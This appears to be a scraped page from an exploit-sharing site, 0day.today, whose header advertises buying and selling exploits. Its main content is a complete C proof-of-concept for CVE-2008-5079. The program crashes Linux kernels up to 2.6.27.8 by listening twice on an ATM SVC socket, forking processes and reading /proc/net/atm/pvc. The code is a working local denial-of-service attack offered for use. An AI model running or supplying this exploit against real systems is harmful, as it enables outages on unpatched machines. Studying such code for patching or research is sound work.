0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit
[===============================================================
Linux Kernel <= 2.6.27.8 ATMSVC Local Denial of Service Exploit
===============================================================
/*
* cve-2008-5079.c
*
* Linux Kernel <= 2.6.27.8 ATMSVC local DoS
* Jon Oberheide <jon@oberheide.org>
*
* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5079:
*
* net/atm/svc.c in the ATM subsystem in the Linux kernel 2.6.27.8
* and earlier allows local users to cause a denial of service
* (kernel infinite loop) by making two calls to svc_listen for the
* same socket, and then reading a /proc/net/atm/*vc file, related
* to corruption of the vcc table.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <errno.h>
#include <linux/atm.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#define NR_CPUS 8
#define PROC_ATM "/proc/net/atm/pvc"
int
main(void)
{
char *err, dummy[1024];
int i, ret, sock, proc;
struct atm_qos qos;
struct sockaddr_atmsvc addr;
printf("[+] creating ATM socket...\n");
sock = socket(PF_ATMSVC, SOCK_DGRAM, 0);
if (sock < 0) {
err = "socket(2) for type PF_ATMSVC failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
memset(&qos, 0, sizeof(qos));
qos.rxtp.traffic_class = ATM_UBR;
qos.txtp.traffic_class = ATM_UBR;
qos.aal = ATM_NO_AAL;
printf("[+] setting socket QoS options...\n");
ret = setsockopt(sock, SOL_ATM, SO_ATMQOS, &qos, sizeof(qos));
if (ret == -1) {
err = "setsockopt(2) for option SO_ATMQOS failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
memset(&addr, 0, sizeof(addr));
addr.sas_family = AF_ATMSVC;
printf("[+] binding socket...\n");
bind(sock, (struct sockaddr *) &addr, sizeof(addr));
printf("[+] socket listen...\n");
listen(sock, 10);
printf("[+] duplicate socket listen...\n");
listen(sock, 10);
printf("[+] attempting local DoS...\n");
for (i = 0; i < NR_CPUS; ++i) {
if (fork() != 0) {
break;
}
}
proc = open(PROC_ATM, O_RDONLY);
if (proc == -1) {
err = "opening " PROC_ATM " failed";
printf("[-] PoC error: %s (%s)\n", err, strerror(errno));
return 1;
}
ret = read(proc, &dummy, 1024);
close(proc);
printf("[-] Local DoS failed.\n");
return 0;
}
# 0day.today [2024-12-23] #